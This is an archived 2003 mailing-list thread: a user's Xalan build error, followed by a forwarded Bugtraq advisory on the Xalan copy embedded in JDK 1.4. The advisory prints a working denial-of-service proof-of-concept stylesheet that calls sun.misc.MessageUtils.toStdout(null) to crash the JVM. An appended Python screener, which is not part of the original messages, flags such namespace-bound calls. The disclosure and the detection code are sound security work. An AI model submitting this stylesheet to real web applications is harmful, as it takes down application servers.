[Opensource] Interesting Read....

Maurizio Brilli mbrilli at tiscali.it
Fri Sep 19 01:38:36 PDT 2003


Hi Mike,

it looks like I'm the one who gets funny things out of cvs building...

Right about Xalan, yesterday I was trying to build the eforum package 
from cvs download (I used the "build-all" target), but I was stopped 
at the "xmldocs" target with the following error message:

     [java] Exception in thread "main" java.lang.ClassCastException: org.apache.xalan.res.XSLTErrorResources_it
     [java]     at org.apache.xalan.xslt.Process.main(Process.java:209)
 
By a quick search in the Internet, the problem seems to be connected to 
the old Xalan version distributed with the J2SDK 1.4, but ant shouldn't 
take that library from there, as I've downloaded also the "libs" package 
from cvs... BTW, I read somewhere that there is a chance of upgrading 
the J2SDK libraries by adding an "endorsed" directory to $JAVA_HOME/lib 
and putting there the new jars, but even this has been no use...

Any hints?
Thank you very much
Ciao
Maurizio

Michael Rimov ha scritto:

> Hey All,
>
> For those of you that may think I'm nuts by always including the 
> latest Xalan release rather than relying on the ones that are just 
> included in the 1.4 JDK's.  This is something that was originally 
> posted to the BugTraq mailing list today.  My [sometimes irritating] 
> habits have paid off ;)
>
> Cheers! :)
>                                 -Mike
>
> -----------------------------------------------------------------------------
> ILLEGALACCESS.ORG JAVA SECURITY ANNOUNCEMENT
> --------------------------------------------------------------------------
>
> PACKAGE   : Embedded XALAN packages in JDK 1.4.x
> SUMMARY   : Vulnerable classes callable via user injectable xsl template
> THREAT    : denial of service
> DATE      : 2003-09-17 18:09:00
> ID        : IAC200309-02
> VERSIONS  : JDK 1.4.x
> Author    : Marc Schoenefeld, marc at beauchamp.de
> -------------------------------------------------------------------------
>
>
> Hi Bugtraq,
>
> ten days ago I submitted a bug to the Sun Bug database about
> an Apache XALAN problem that causes a JVM crash when parsing
> XML/XSLT data in JDK 1.4.1/1.4.2 on Linux and Windows.
> The problem is the possibility that the methods of internal sun.*
> classes can be made visible via an xslt namespace and used
> in xslt programs. Some of the sun.* classes are native
> and therefore are vulnerable to bad parameter passing. A well known
> method that is vulnerable in almost all jdk versions
> is sun.misc.MessageUtils.toStdout with a passed null object.
> These vulnerabilities have been demonstrated by illegalaccess.org
> at several blackhat conferences and are well known to Sun since
> October 2002.
>
> Till today (one week after vendor contact) I got no qualified response
> from SUN about their attitude towards the criticality and moreover the
> plans to fix the bug. To speed things up, I now decided to release the
> bug to BUGTRAQ.
>
> The technique used becomes a dangerous thing when such an xml/xslt
> combination can be supplied from the user to a web application or java
> web service, which then causes a jvm crash and DoSing the whole java process,
> which is in worst case the application server or web server.
>
> Cheers
> Marc
>
> Command:
>
> c:\java\1.4.2\00\jre\bin\java org.apache.xalan.xslt.Process -IN a.xml -xsl sunexploit.xsl
>
>
> Used Files:
>
> ===================a.xml===========================
> (a/)
> ===================a.xml===========================
>
>
> ===========sunexploit.xsl=============================
> (!-- XSLT JDK-Exploit by Marc Schoenefeld , marc at at@illegalaccess.org --)
> (xsl:stylesheet version="1.0"
>    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
>                xmlns:sun="sun")
>                (xsl:template match="/")
>                (xsl:variable name="tmp"
> select="sun:misc.MessageUtils.toStdout(null)"/)
>                (xsl:variable name="tmp2"
> select="sun:misc.MessageUtils.toStdout($tmp)"/)
>                (xsl:value-of select="$tmp2" /)
>                (/xsl:template)
> (/xsl:stylesheet)
> ===========sunexploit.xsl=============================
>
>
>
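
The advisory quoted above describes a stylesheet that binds a namespace prefix to a Java package and calls methods through it. One way an application that accepts user-supplied XSL could screen for that before handing the stylesheet to the processor, as an added example that is not part of either message; the function name, the allow-list and the sample stylesheets are constructed for illustration:

```python
import io
import re
import xml.etree.ElementTree as ET

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"
# Allow-list: any other namespace may be bound by the processor to extension code.
ALLOWED_NS = {XSLT_NS, "http://www.w3.org/XML/1998/namespace"}
PULL_IN = {"{%s}import" % XSLT_NS, "{%s}include" % XSLT_NS}
# prefix:name( inside an XPath attribute is a namespaced function call.
# This over-matches inside string literals, which suits a deny-leaning screen.
PREFIXED_CALL = re.compile(r"([A-Za-z_][\w.-]*):[A-Za-z_][\w.-]*\s*\(")


def screen_stylesheet(xsl_text):
    """Return findings for an untrusted stylesheet; an empty list means accept."""
    if "<!DOCTYPE" in xsl_text:
        return ["DTD present: rejected before parsing"]
    findings = []
    source = io.BytesIO(xsl_text.encode("utf-8"))
    try:
        for event, item in ET.iterparse(source, events=("start-ns", "start")):
            if event == "start-ns":
                prefix, uri = item
                if uri not in ALLOWED_NS:
                    findings.append(f"namespace {prefix!r} -> {uri!r} not allow-listed")
            elif item.tag in PULL_IN:
                findings.append("xsl:import/xsl:include pulls in an unscreened stylesheet")
            else:
                for name, value in item.attrib.items():
                    for match in PREFIXED_CALL.finditer(value):
                        findings.append(f"call via prefix {match.group(1)!r} in @{name}")
    except ET.ParseError as exc:
        return [f"not well-formed: {exc}"]
    return findings


# Constructed samples (not from the thread); the second binds a prefix to a
# Java package name, the pattern the advisory describes, with a harmless call.
CLEAN = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><xsl:value-of select="count(//item)"/></xsl:template>
</xsl:stylesheet>"""
BOUND = CLEAN.replace('Transform">', 'Transform" xmlns:j="java.lang">').replace(
    "count(//item)", "j:Math.abs(-1)")

if __name__ == "__main__":
    for label, text in (("clean", CLEAN), ("bound", BOUND)):
        print(label, screen_stylesheet(text))
```

A screen like this runs before the stylesheet reaches the XSLT processor; it does not replace keeping the processor itself current, which is the habit Mike describes.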



